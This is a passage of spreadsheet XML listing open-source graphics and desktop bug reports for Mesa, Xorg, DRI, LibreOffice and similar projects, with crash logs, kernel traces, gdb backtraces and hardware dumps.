  <si>
    <t>MESA-101415</t>
  </si>
  <si>
    <t>Error running clBLAS clblas-client:  unsupported call to function mem_fence</t>
  </si>
  <si>
    <t>When I try to run the clblas-client from clBLAS I get an error:
[miguel@antergos-mig staging]$ ./clBLAS-client 
Error: Failed makeGemmKernel: Creating program from source
clBuildProgram Failed
err = -11
Error: Failed to build program executable!
Build Log:
input.cl:107:5: warning: implicit declaration of function 'mem_fence' is invalid in C99
input.cl:37:3: note: expanded from macro 'MICRO_TILE'
:0:0: in function sgemm_Col_NN_B1_MX016_NX016_KX16 void (float addrspace(1)* float addrspace(1)* float addrspace(1)* float float i32 i32 i32 i32 i32 i32 i32 i32 i32): unsupported call to function mem_fence
....
My system is antergos ARCH-Linux with configuration as follows:
clinfo
Number of platforms                               1
  Platform Name                                   Clover
  Platform Vendor                                 Mesa
  Platform Version                                OpenCL 1.1 Mesa 17.1.2
  Platform Profile                                FULL_PROFILE
  Platform Extensions                             cl_khr_icd
  Platform Extensions function suffix             MESA
  Platform Name                                   Clover
Number of devices                                 1
  Device Name                                     AMD TONGA (DRM 3.10.0 / 4.11.3-1-ARCH LLVM 4.0.0)
  Device Vendor                                   AMD
  Device Vendor ID                                0x1002
  Device Version                                  OpenCL 1.1 Mesa 17.1.2
  Driver Version                                  17.1.2
  Device OpenCL C Version                         OpenCL C 1.1 
  Device Type                                     GPU
  Device Available                                Yes
  Device Profile                                  FULL_PROFILE
  Max compute units                               28
  Max clock frequency                             990MHz
  Max work item dimensions                        3
  Max work item sizes                             256x256x256
  Max work group size                             256
  Compiler Available                              Yes
  Preferred work group size multiple              64
  Preferred / native vector sizes                 
    char                                                16 / 16      
    short                                                8 / 8       
    int                                                  4 / 4       
    long                                                 2 / 2       
    half                                                 0 / 0        (n/a)
    float                                                4 / 4       
    double                                               2 / 2        (cl_khr_fp64)
  Half-precision Floating-point support           (n/a)
  Single-precision Floating-point support         (core)
    Denormals                                     No
    Infinity and NANs                             Yes
    Round to nearest                              Yes
    Round to zero                                 No
    Round to infinity                             No
    IEEE754-2008 fused multiply-add               No
    Support is emulated in software               No
    Correctly-rounded divide and sqrt operations  No
  Double-precision Floating-point support         (cl_khr_fp64)
    Denormals                                     Yes
    Infinity and NANs                             Yes
    Round to nearest                              Yes
    Round to zero                                 Yes
    Round to infinity                             Yes
    IEEE754-2008 fused multiply-add               Yes
    Support is emulated in software               No
    Correctly-rounded divide and sqrt operations  No
  Address bits                                    64 Little-Endian
  Global memory size                              2145640448 (1.998GiB)
  Error Correction support                        No
  Max memory allocation                           1501948313 (1.399GiB)
  Unified memory for Host and Device              Yes
  Minimum alignment for any data type             128 bytes
  Alignment of base address                       1024 bits (128 bytes)
  Global Memory cache type                        None
  Image support                                   No
  Local memory type                               Local
  Local memory size                               32768 (32KiB)
  Max constant buffer size                        1501948313 (1.399GiB)
  Max number of constant args                     16
  Max size of kernel argument                     1024
  Queue properties                                
    Out-of-order execution                        No
    Profiling                                     Yes
  Profiling timer resolution                      0ns
  Execution capabilities                          
    Run OpenCL kernels                            Yes
    Run native kernels                            No
  Device Extensions                               cl_khr_global_int32_base_atomics cl_khr_global_int32_extended_atomics cl_khr_local_int32_base_atomics cl_khr_local_int32_extended_atomics cl_khr_byte_addressable_store cl_khr_fp64
NULL platform behavior
  clGetPlatformInfo(NULL CL_PLATFORM_NAME ...)  Clover
  clGetDeviceIDs(NULL CL_DEVICE_TYPE_ALL ...)   Success [MESA]
  clCreateContext(NULL ...) [default]            Success [MESA]
  clCreateContextFromType(NULL CL_DEVICE_TYPE_CPU)  No devices found in platform
  clCreateContextFromType(NULL CL_DEVICE_TYPE_GPU)  Success (1)
    Platform Name                                 Clover
    Device Name                                   AMD TONGA (DRM 3.10.0 / 4.11.3-1-ARCH LLVM 4.0.0)
  clCreateContextFromType(NULL CL_DEVICE_TYPE_ACCELERATOR)  No devices found in platform
  clCreateContextFromType(NULL CL_DEVICE_TYPE_CUSTOM)  No devices found in platform
  clCreateContextFromType(NULL CL_DEVICE_TYPE_ALL)  Success (1)
    Platform Name                                 Clover
    Device Name                                   AMD TONGA (DRM 3.10.0 / 4.11.3-1-ARCH LLVM 4.0.0)
ICD loader properties
  ICD loader Name                                 OpenCL ICD Loader
  ICD loader Vendor                               OCL Icd free software
  ICD loader Version                              2.2.11
  ICD loader Profile                              OpenCL 2.1</t>
  </si>
  <si>
    <t>mastner</t>
  </si>
  <si>
    <t>DRI-93248</t>
  </si>
  <si>
    <t>[BAT BDW SKL] slab poisoning over module reload since build CI_DRM_862</t>
  </si>
  <si>
    <t>Our dear CI started to catch a slab poisoning regression on bdw-nuci7 and skl-i5k-2. Unfortuntely by the time slab notices the problem i915.ko is unloaded already which means the crucial functions aren't decoded. Someone with local access to the machines needs to first grab a copy of /proc/kallsyms then reproduce using the module reload testcase and then manually decode where the culprit exactly is.
Anyway example dmesg splat below:
[  170.349516] =============================================================================
[  170.349523] BUG kmalloc-256 (Tainted: G    BU  W      ): Poison overwritten
[  170.349526] -----------------------------------------------------------------------------
[  170.349533] INFO: 0xffff880212ff16d0-0xffff880212ff16d0. First byte 0x66 instead of 0x6b
[  170.349539] INFO: Allocated in 0xffffffffa01eb19b age=161765 cpu=2 pid=299
[  170.349544] 	___slab_alloc.constprop.59+0x35e/0x390
[  170.349548] 	__slab_alloc.isra.56.constprop.58+0x43/0x80
[  170.349552] 	kmem_cache_alloc_trace+0x25e/0x2e0
[  170.349555] 	0xffffffffa01eb19b
[  170.349557] 	0xffffffffa01eb5f5
[  170.349560] 	0xffffffffa02001e2
[  170.349562] 	0xffffffffa027edff
[  170.349566] 	drm_dev_register+0xa4/0xb0
[  170.349570] 	drm_get_pci_dev+0xce/0x1e0
[  170.349572] 	0xffffffffa01c22cf
[  170.349577] 	pci_device_probe+0x87/0xf0
[  170.349581] 	driver_probe_device+0x221/0x4a0
[  170.349584] 	__driver_attach+0x83/0x90
[  170.349587] 	bus_for_each_dev+0x61/0xa0
[  170.349590] 	driver_attach+0x19/0x20
[  170.349593] 	bus_add_driver+0x1ef/0x290
[  170.349596] INFO: Freed in 0xffffffffa01eaf59 age=142 cpu=2 pid=6059
[  170.349600] 	__slab_free+0x356/0x4a0
[  170.349603] 	kfree+0x283/0x290
[  170.349606] 	0xffffffffa01eaf59
[  170.349608] 	0xffffffffa01eb843
[  170.349610] 	0xffffffffa027f6b0
[  170.349614] 	drm_dev_unregister+0x24/0xa0
[  170.349617] 	drm_put_dev+0x1e/0x60
[  170.349620] 	0xffffffffa01c2290
[  170.349623] 	pci_device_remove+0x34/0xb0
[  170.349626] 	__device_release_driver+0x91/0x130
[  170.349630] 	driver_detach+0xb3/0xc0
[  170.349633] 	bus_remove_driver+0x53/0xd0
[  170.349636] 	driver_unregister+0x27/0x50
[  170.349640] 	pci_unregister_driver+0x25/0x70
[  170.349643] 	drm_pci_exit+0x74/0x90
[  170.349645] 	0xffffffffa02809be
[  170.349648] INFO: Slab 0xffffea00084bfc00 objects=28 used=28 fp=0x          (null) flags=0x8000000000004080
[  170.349654] INFO: Object 0xffff880212ff16d0 @offset=5840 fp=0xffff880212ff0db0
[  170.349660] Bytes b4 ffff880212ff16c0: 82 8d fb ff 00 00 00 00 5a 5a 5a 5a 5a 5a 5a 5a  ........ZZZZZZZZ
[  170.349665] Object ffff880212ff16d0: 66 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  fkkkkkkkkkkkkkkk
[  170.349671] Object ffff880212ff16e0: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349676] Object ffff880212ff16f0: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349681] Object ffff880212ff1700: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349686] Object ffff880212ff1710: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349691] Object ffff880212ff1720: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349696] Object ffff880212ff1730: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349701] Object ffff880212ff1740: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349706] Object ffff880212ff1750: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349711] Object ffff880212ff1760: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349716] Object ffff880212ff1770: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349721] Object ffff880212ff1780: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349726] Object ffff880212ff1790: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349731] Object ffff880212ff17a0: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349736] Object ffff880212ff17b0: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk
[  170.349741] Object ffff880212ff17c0: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.
[  170.349746] Redzone ffff880212ff17d0: bb bb bb bb bb bb bb bb                          ........
[  170.349751] Padding ffff880212ff1910: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ
[  170.349756] CPU: 3 PID: 6065 Comm: modprobe Tainted: G    BU  W       4.4.0-rc3-gfxbench+ #1
[  170.349757] Hardware name:                  /NUC5i7RYB BIOS RYBDWi35.86A.0249.2015.0529.1640 05/29/2015
[  170.349758]  ffff880212ff16d0 ffff8800d8c5f580 ffffffff813df42c ffff8802158073c0
[  170.349761]  ffff8800d8c5f5c0 ffffffff811a6093 0000000000000008 ffff880200000001
[  170.349763]  ffff880212ff16d1 ffff8802158073c0 000000000000006b ffff880212ff16d0
[  170.349765] Call Trace:
[  170.349767]  [] dump_stack+0x4e/0x82
[  170.349768]  [] print_trailer+0x143/0x1f0
[  170.349770]  [] check_bytes_and_report+0xc8/0x110
[  170.349771]  [] check_object+0x1c1/0x240
[  170.349773]  [] ? __proc_create+0xb2/0x280
[  170.349774]  [] alloc_debug_processing+0x9b/0x190
[  170.349775]  [] ___slab_alloc.constprop.59+0x35e/0x390
[  170.349776]  [] ? __proc_create+0xb2/0x280
[  170.349778]  [] ? debug_check_no_obj_freed+0x10c/0x1f0
[  170.349780]  [] ? ida_get_new_above+0x1d7/0x210
[  170.349781]  [] ? kmem_cache_free+0x134/0x350
[  170.349782]  [] ? __proc_create+0xb2/0x280
[  170.349784]  [] __slab_alloc.isra.56.constprop.58+0x43/0x80
[  170.349785]  [] __kmalloc+0x2bb/0x330
[  170.349786]  [] __proc_create+0xb2/0x280
[  170.349788]  [] proc_create_data+0x4d/0xc0
[  170.349790]  [] register_irq_proc+0x138/0x140
[  170.349791]  [] __setup_irq+0x27e/0x600
[  170.349807]  [] ? gen8_gt_irq_handler+0x250/0x250 [i915]
[  170.349809]  [] request_threaded_irq+0xf0/0x190
[  170.349810]  [] drm_irq_install+0x90/0x170
[  170.349822]  [] intel_irq_install+0x20/0x30 [i915]
[  170.349843]  [] i915_driver_load+0xeec/0x1670 [i915]
[  170.349845]  [] ? debug_check_no_obj_freed+0x10c/0x1f0
[  170.349847]  [] ? klist_add_tail+0x20/0x40
[  170.349849]  [] ? drm_minor_register+0x7c/0x110
[  170.349851]  [] ? drm_minor_register+0xa1/0x110
[  170.349852]  [] drm_dev_register+0xa4/0xb0
[  170.349854]  [] drm_get_pci_dev+0xce/0x1e0
[  170.349856]  [] ? _raw_spin_unlock_irqrestore+0x3d/0x60
[  170.349867]  [] i915_pci_probe+0x2f/0x50 [i915]
[  170.349869]  [] pci_device_probe+0x87/0xf0
[  170.349870]  [] driver_probe_device+0x221/0x4a0
[  170.349872]  [] __driver_attach+0x83/0x90
[  170.349873]  [] ? driver_probe_device+0x4a0/0x4a0
[  170.349875]  [] bus_for_each_dev+0x61/0xa0
[  170.349876]  [] driver_attach+0x19/0x20
[  170.349878]  [] bus_add_driver+0x1ef/0x290
[  170.349879]  [] driver_register+0x5b/0xe0
[  170.349881]  [] __pci_register_driver+0x5b/0x60
[  170.349883]  [] drm_pci_init+0xd6/0x100
[  170.349884]  [] ? 0xffffffffa0171000
[  170.349895]  [] i915_init+0x94/0x9b [i915]
[  170.349897]  [] do_one_initcall+0xae/0x1d0
[  170.349899]  [] ? do_init_module+0x22/0x1e0
[  170.349900]  [] ? kmem_cache_alloc_trace+0xe3/0x2e0
[  170.349902]  [] do_init_module+0x5b/0x1e0
[  170.349904]  [] load_module+0x1b57/0x2440
[  170.349905]  [] ? symbol_put_addr+0x60/0x60
[  170.349907]  [] ? copy_module_from_fd.isra.58+0xe6/0x140
[  170.349909]  [] SyS_finit_module+0x7b/0xa0
[  170.349911]  [] entry_SYSCALL_64_fastpath+0x16/0x73
[  170.349912] FIX kmalloc-256: Restoring 0xffff880212ff16d0-0xffff880212ff16d0=0x6b
[  170.349918] FIX kmalloc-256: Marking all objects used</t>
  </si>
  <si>
    <t>XORG-448</t>
  </si>
  <si>
    <t>Xserver build fix for AMD64 machines</t>
  </si>
  <si>
    <t>I'll attach a Xserver build fix for AMD64 machines (undefineded reference to 
a afb function in libdriver.a (vesa driver)).</t>
  </si>
  <si>
    <t>MESA-25599</t>
  </si>
  <si>
    <t>[i965] use after free src/mesa/drivers/dri/i965/brw_state_cache.c:561</t>
  </si>
  <si>
    <t>mesa: 7d41b4248bee1d926646ef5fdff07da4f9026589 (mesa_7_6_branch)
The pointer c is freed in brw_state_cache.c:552 and then dereferenced in brw_state_cache.c:561.
src/mesa/drivers/dri/i965/brw_state_cache.c
   525  void
   526  brw_state_cache_bo_delete(struct brw_cache *cache dri_bo *bo)
   527  {
   528     struct brw_cache_item **prev
   529     GLuint i
   530  
   531     if (INTEL_DEBUG &amp; DEBUG_STATE)
   532        _mesa_printf(%s\n __FUNCTION__)
   533  
   534     for (i = 0 i size i++) {
   535        for (prev =  *prev) {
   536           struct brw_cache_item *c = *prev
   537           int j
   538  
   539           for (j = 0 j nr_reloc_bufs j++) {
   540              if (c-&gt;reloc_bufs[j] == bo)
   541                 break
   542           }
   543  
   544           if (j != c-&gt;nr_reloc_bufs) {
   545  
   546              *prev = c-&gt;next
   547  
   548              for (j = 0 j nr_reloc_bufs j++)
   549                 dri_bo_unreference(c-&gt;reloc_bufs[j])
   550              dri_bo_unreference(c-&gt;bo)
   551              free((void *)c-&gt;key)
   552              free(c)
   553              cache-&gt;n_items--
   554  
   555              /* Delete up the tree.  Notably we're trying to get from
   556               * a request to delete the surface to deleting the surface state
   557               * object to deleting the binding table.  We're slack and restart
   558               * the deletion process when we do this because the other delete
   559               * may kill our *prev.
   560               */
-&gt; 561              brw_state_cache_bo_delete(cache c-&gt;bo)
   562              prev = 
   563           } else {
   564              prev = 
   565           }
   566        }
   567     }
   568  }</t>
  </si>
  <si>
    <t>POPPLER-34241</t>
  </si>
  <si>
    <t>missing annotations for poppler_page_get_size (introspection)</t>
  </si>
  <si>
    <t>Created attachment 43325
patch for poppler_page_get_size
poppler_page_get_size is missing some annotations which make it usable from other languages (Python in my case).
The attached patch adds the necessary annotations.
(side note: there's probably other annotations missing in other places
I haven't bothered to go looking - this is just one which I needed)</t>
  </si>
  <si>
    <t>peteraward</t>
  </si>
  <si>
    <t>XORG-11823</t>
  </si>
  <si>
    <t>Xserver crash in XMesaCreateContext when running glxinfo with fbdev driver</t>
  </si>
  <si>
    <t>Reported by JiÅ™Ã­ PaleÄek a couple days ago on the Debian BTS. Xserver 1.3 (debian 2:1.3.0.0-dfsg-11) crashes when running glxinfo and using the fbdev driver. I'll attach his log and config below. Here's the backtrace he got with gdb:
#0  0xb7dfb69c in memcpy () from /lib/i686/cmov/libc.so.6
No symbol table info available.
#1  0xb2b1d42c in _mesa_initialize_context (ctx=0x8ac179c visual=0x18
    share_list=0x0 driverFunctions=0xbfce05a4 driverContext=0x8ac1720)
    at context.c:1302
No locals.
#2  0xb2c7b5b7 in XMesaCreateContext (v=0x18 share_list=0x0) at xm_api.c:1525
        c = (XMesaContext) 0x8ac1720
        functions = {GetString = 0xb2c7c590 
  UpdateState = 0xb2c7ce70  GetBufferSize = 0
  ResizeBuffers = 0xb2b41870  Error = 0
  Finish = 0xb2c7c580  Flush = 0xb2c7c580 
  Clear = 0xb2c7d280  Accum = 0xb2bc9ca0 
  DrawPixels = 0xb2bd8820 
  ReadPixels = 0xb2be7d40 
  CopyPixels = 0xb2bd3270 
  Bitmap = 0xb2bccf30 
  ChooseTextureFormat = 0xb2b91220 
  TexImage1D = 0xb2ba3be0 
  TexImage2D = 0xb2ba3950 
  TexImage3D = 0xb2ba3700 
  TexSubImage1D = 0xb2ba3590 
  TexSubImage2D = 0xb2ba33f0 
  TexSubImage3D = 0xb2ba3250 
  GetTexImage = 0xb2ba2900 
  CopyTexImage1D = 0xb2bfebb0 
  CopyTexImage2D = 0xb2bfe970 
  CopyTexSubImage1D = 0xb2bfe720 
  CopyTexSubImage2D = 0xb2bfe4f0 
  CopyTexSubImage3D = 0xb2bfe250 
  TestProxyTexImage = 0xb2c7c6c0 
  CompressedTexImage1D = 0xb2ba25a0 
  CompressedTexImage2D = 0xb2ba3050 
  CompressedTexImage3D = 0xb2ba25b0 
  CompressedTexSubImage1D = 0xb2ba25c0 
  CompressedTexSubImage2D = 0xb2ba2f00 
  CompressedTexSubImage3D = 0xb2ba25d0 
  GetCompressedTexImage = 0xb2ba2680 
  CompressedTextureSize = 0xb2b879b0 
  BindTexture = 0 NewTextureObject = 0xb2b99bf0 
  DeleteTexture = 0xb2b99a60 
  NewTextureImage = 0xb2b95cd0 
  FreeTexImageData = 0xb2b95d30 
  TextureMemCpy = 0xb2b6f990  IsTextureResident = 0
  PrioritizeTexture = 0 ActiveTexture = 0 UpdateTexturePalette = 0
  CopyColorTable = 0xb2bdbb10 
  CopyColorSubTable = 0xb2bdb9f0 
  CopyConvolutionFilter1D = 0xb2bdb900 
  CopyConvolutionFilter2D = 0xb2bdb680 
  BindProgram = 0 NewProgram = 0xb2c5e6a0 
  DeleteProgram = 0xb2c5fd10 
  ProgramStringNotify = 0xb2c27990 
  GetFragmentProgramRegister = 0xb2bdff00 
  IsProgramNative = 0 AlphaFunc = 0 BlendColor = 0
  BlendEquationSeparate = 0 BlendFuncSeparate = 0
  ClearColor = 0xb2c7c7d0  ClearDepth = 0
  ClearIndex = 0xb2c7cdc0  ClearStencil = 0 ClipPlane = 0
  ColorMask = 0xb2c7d0a0  ColorMaterial = 0 CullFace = 0
  FrontFace = 0 DepthFunc = 0 DepthMask = 0 DepthRange = 0 DrawBuffer = 0
  DrawBuffers = 0 Enable = 0xb2c7c8e0  Fogfv = 0 Hint = 0
  IndexMask = 0xb2c7d1d0  Lightfv = 0 LightModelfv = 0
  LineStipple = 0 LineWidth = 0 LogicOpcode = 0 PointParameterfv = 0
  PointSize = 0 PolygonMode = 0 PolygonOffset = 0 PolygonStipple = 0
  ReadBuffer = 0 RenderMode = 0 Scissor = 0 ShadeModel = 0
  StencilFuncSeparate = 0 StencilMaskSeparate = 0 StencilOpSeparate = 0
  TexGen = 0 TexEnv = 0 TexParameter = 0 TextureMatrix = 0
  Viewport = 0xb2c7ce20  VertexPointer = 0
  NormalPointer = 0 ColorPointer = 0 FogCoordPointer = 0 IndexPointer = 0
  SecondaryColorPointer = 0 TexCoordPointer = 0 EdgeFlagPointer = 0
  VertexAttribPointer = 0 LockArraysEXT = 0 UnlockArraysEXT = 0
  GetBooleanv = 0 GetDoublev = 0 GetFloatv = 0 GetIntegerv = 0
  GetPointerv = 0 BindBuffer = 0
  NewBufferObject = 0xb2b17220 
  DeleteBuffer = 0xb2b171e0 
  BufferData = 0xb2b16fa0 
  BufferSubData = 0xb2b16f60 
  GetBufferSubData = 0xb2b16f00 
  MapBuffer = 0xb2b168f0 
  UnmapBuffer = 0xb2b16910 
  NewFramebuffer = 0xb2b41a70 
  NewRenderbuffer = 0xb2b84460 
  BindFramebuffer = 0
  FramebufferRenderbuffer = 0xb2b3d930 
  RenderTexture = 0xb2b9a7a0 
  FinishRenderTexture = 0xb2b9a790 
  BlitFramebuffer = 0xb2bcf6b0 
  NewQueryObject = 0xb2b787f0  BeginQuery = 0
  EndQuery = 0 NewArrayObject = 0xb2b12040 
  DeleteArrayObject = 0xb2b12010 
  BindArrayObject = 0 NeedValidate = 0 ValidateTnlModule = 0
  CurrentExecPrimitive = 0 CurrentSavePrimitive = 0 NeedFlush = 0
  SaveNeedFlush = 0 FlushVertices = 0 SaveFlushVertices = 0
  NotifySaveBegin = 0 LightingSpaceChange = 0 NewList = 0 EndList = 0
  BeginCallList = 0 EndCallList = 0}
        firstTime = 0 '\0'
#3  0xb2c78e7c in __glXMesaScreenCreateContext (screen=0x821b720
    modes=0x8212c98 baseShareContext=0x0)
    at ../../../../GL/mesa/X/xf86glx.c:269
        xm_vis = (XMesaVisual) 0x8ac1720
        xm_share = (XMesaContext) 0xb2d18420
#4  0xb7c3e9ce in DoCreateContext (cl=0x8a4fe60 gcId=6291459 shareList=0
    visual=37 screen=0 isDirect=0 '\0') at ../../../GL/glx/glxcmds.c:219
        client = (ClientPtr) 0x8a4eb68
        pVisual = (VisualPtr) 0x822685c
        pScreen = (ScreenPtr) 0x8212500
        glxc = 
        shareglxc = 
        modes = (__GLcontextModes *) 0x8212c98
        pGlxScreen = (__GLXscreen *) 0x821b720
        i = 
#5  0xb7c3ebc4 in __glXDisp_CreateContext (cl=0x8a4fe60
    pc=0x8a4fa18 \217\003\006) at ../../../GL/glx/glxcmds.c:262
No locals.
#6  0xb7c40a8c in __glXDispatch (client=0x8a4eb68)
    at ../../../GL/glx/glxext.c:551
        stuff = (xGLXSingleReq *) 0x8a4fa18
        opcode = 3 '\003'
        proc = (
    __GLXdispatchSingleProcPtr) 0xb7c3eb80 
        cl = (__GLXclientState *) 0x8a4fe60
        retval = 1
#7  0x08154a3e in XaceCatchExtProc (client=0x8a4eb68) at ../../Xext/xace.c:299
        major = 143
        ext = 
#8  0x0808ed3f in Dispatch () at ../../dix/dispatch.c:457
        result = 
        client = (ClientPtr) 0x8a4eb68
        nready = 0
        start_tick = 3820
#9  0x08076e85 in main (argc=6 argv=0xbfce0e24 envp=Cannot access memory at address 0x3c
) at ../../dix/main.c:477
        pScreen = 
        i = 
        error = -1210490788
        xauthfile = 
        alwaysCheckForInput = {0 1}</t>
  </si>
  <si>
    <t>HAL-12972</t>
  </si>
  <si>
    <t>fdi info for Sandisk Sansa e140</t>
  </si>
  <si>
    <t xml:space="preserve">Origin is a launchpad bug :
https://bugs.edge.launchpad.net/ubuntu/+source/hal/+bug/134849
From the patch it looks identical to the e130 (just a different usb prod ID)
-           
-           
+           
+           </t>
  </si>
  <si>
    <t>XORG-24621</t>
  </si>
  <si>
    <t>libX11/src/xcb_io.c:553: _XRead: Assertion `dpy-&gt;xcb-&gt;reply_data != ((void *)0)' failed.</t>
  </si>
  <si>
    <t>Xdmx with a 1.6.5 Xserver backend seems to work fine. Xdmx with a 1.7.0 or git master backend seems to sometimes fail with the assert: libX11/src/xcb_io.c:553: _XRead: Assertion `dpy-&gt;xcb-&gt;reply_data != ((void *)0)' failed.
Xdmx: /opt/jhbuild/git/xorg/lib/libX11/src/xcb_io.c:553: _XRead: Assertion `dpy-&gt;xcb-&gt;reply_data != ((void *)0)' failed.
Program received signal SIGABRT Aborted.
[Switching to Thread 0xb7aa36c0 (LWP 6425)]
0xffffe424 in __kernel_vsyscall ()
(gdb) bt
#0  0xffffe424 in __kernel_vsyscall ()
#1  0xb7ae8660 in *__GI_raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#2  0xb7ae9e98 in *__GI_abort () at abort.c:88
#3  0xb7ae16ce in *__GI___assert_fail (assertion=0xb802c61c dpy-&gt;xcb-&gt;reply_data != ((void *)0)
    file=0xb802c5ec /opt/jhbuild/git/xorg/lib/libX11/src/xcb_io.c line=553
    function=0xb802c771 _XRead) at assert.c:78
#4  0xb7fbe44b in _XRead (dpy=0x9845918 data=0x999cad8 \030å¿·\030å¿·â–’â–’\231\tâ–’â–’\231\td size=960)
    at /opt/jhbuild/git/xorg/lib/libX11/src/xcb_io.c:553
#5  0xb7fbe488 in _XReadPad (dpy=0x9845918 data=0x999cad8 \030å¿·\030å¿·â–’â–’\231\tâ–’â–’\231\td
    size=0) at /opt/jhbuild/git/xorg/lib/libX11/src/xcb_io.c:568
#6  0xb7fa52e1 in XGetModifierMapping (dpy=0x9845918)
    at /opt/jhbuild/git/xorg/lib/libX11/src/ModMap.c:55
#7  0x08192216 in dmxCommonSaveState (private=0x98c2100)
    at /opt/jhbuild/git/xorg/xserver/hw/dmx/input/dmxcommon.c:609
#8  0x0819326d in dmxCommonKbdGetInfo (pDev=0x98c2380 info=0xbf9adfd0)
    at /opt/jhbuild/git/xorg/xserver/hw/dmx/input/dmxcommon.c:265
#9  0x0818e89e in dmxBackendKbdGetInfo (pDev=0x98c2380 info=0xbf9adfd0)
    at /opt/jhbuild/git/xorg/xserver/hw/dmx/input/dmxbackend.c:597
#10 0x08187337 in dmxDeviceOnOff (pDevice=0x98c2380 what=0)
    at /opt/jhbuild/git/xorg/xserver/hw/dmx/input/dmxinputinit.c:447
#11 0x08127309 in ActivateDevice (dev=0x98c2380 sendevent=1 '\001')
    at /opt/jhbuild/git/xorg/xserver/dix/devices.c:470
#12 0x08127cca in InitAndStartDevices () at /opt/jhbuild/git/xorg/xserver/dix/devices.c:640
#13 0x0811d565 in main (argc=4 argv=0xbf9aeb44 envp=Cannot access memory at address 0x1921
)
    at /opt/jhbuild/git/xorg/xserver/dix/main.c:258
(gdb) frame 4
#4  0xb7fbe44b in _XRead (dpy=0x9845918 data=0x999cad8 \030å¿·\030å¿·â–’â–’\231\tâ–’â–’\231\td size=960)
    at /opt/jhbuild/git/xorg/lib/libX11/src/xcb_io.c:553
553             assert(dpy-&gt;xcb-&gt;reply_data != NULL)
(gdb) p *dpy-&gt;xcb
$1 = {connection = 0x9846bb8 pending_requests = 0x99a5a40 pending_requests_tail = 0x99a5a40
  next_event = 0x0 real_bufmax = 0x9850418  reply_data = 0x0 reply_length = 52
  reply_consumed = 52 last_flushed = 221 event_owner = XlibOwnsEventQueue next_xid = 8388703
  event_notify = 0x9845600 event_waiter = 0}
(gdb)</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-35642</t>
  </si>
  <si>
    <t>To change default xkb keyboard layout for Burmese (Myanmar)</t>
  </si>
  <si>
    <t>Created attachment 44804
Myanmar3 Keyboard Layout
The basic layout for Burmese included x11 is not flexible (easy to type) and not widely used for typing Burmese. Actually I can honestly say that nobody ever uses that layout.
Until now we are using a custom debian package which overwrites that basic layout (symbols/mm). But since ubuntu (dpkg?) disables overwriting files of other packages (though it can still be enabled using --force-overwrite) it is getting more troublesome to install for non-geek users to install. 
I would like to request to change it to more widely used Myanmar3 layout. It is one of the most popular keyboard layouts for Burmese. It is also the official layout for Myanmar3 Unicode font produced Myanmar NLP. (http://www.myanmarnlp.net.mm/).</t>
  </si>
  <si>
    <t>trhura</t>
  </si>
  <si>
    <t>LIBREOFFICE-86662</t>
  </si>
  <si>
    <t>Problems With dotx files / Crash</t>
  </si>
  <si>
    <t>Created attachment 109942
dotx bug
LibreOffice ver: 4.3.4.1
i have some problems when i need open a .dotx file. First i open libreoffice with terminal for debug any problems and try to open a file (dotx) immediately the program is closed never show any problem in terminal and the file never is loaded. 
A friend of the community libreoffice Venezuela says that these files are not a problem in the stable release and that i should download and install the newest version at day (at that time I had the version 4.3.2.2 ).
Well after downloaded and install i'm here reporting the problem i hope find some solutions quickly thanks and greetings from Venezuela
i have some screenshots powered by dropbox :
https://www.dropbox.com/sh/3lnrphzg90nuudw/AAA6Yl_FtVmM_Q4p1hXCcjM-a?dl=0</t>
  </si>
  <si>
    <t>neocarvajal12</t>
  </si>
  <si>
    <t>XORG-24565</t>
  </si>
  <si>
    <t>Keyboard indicator lights don't function</t>
  </si>
  <si>
    <t>Following on the heels of patch 24557 xev shows that the Caplock key triggers the correct keysym yet the Capslock keyboard indicator light does not come on.
Num lock and Scroll lock indicator lights are similarly affected.</t>
  </si>
  <si>
    <t>LIBREOFFICE-35001</t>
  </si>
  <si>
    <t>spellcheck context menu contains too few variants</t>
  </si>
  <si>
    <t>Created attachment 44110
spellcheck context menu contains too few variants
spellcheck context menu contains too few variants
explanations in Attachment
tryed on Linux 64 bit yet</t>
  </si>
  <si>
    <t>TELEPATHY-35755</t>
  </si>
  <si>
    <t>Error to report insufficient Balance</t>
  </si>
  <si>
    <t>We need an error to report when there is insufficient balance to place a call.</t>
  </si>
  <si>
    <t>DRI-92942</t>
  </si>
  <si>
    <t>[BSW]igt/gem_pwrite_snooped test fail</t>
  </si>
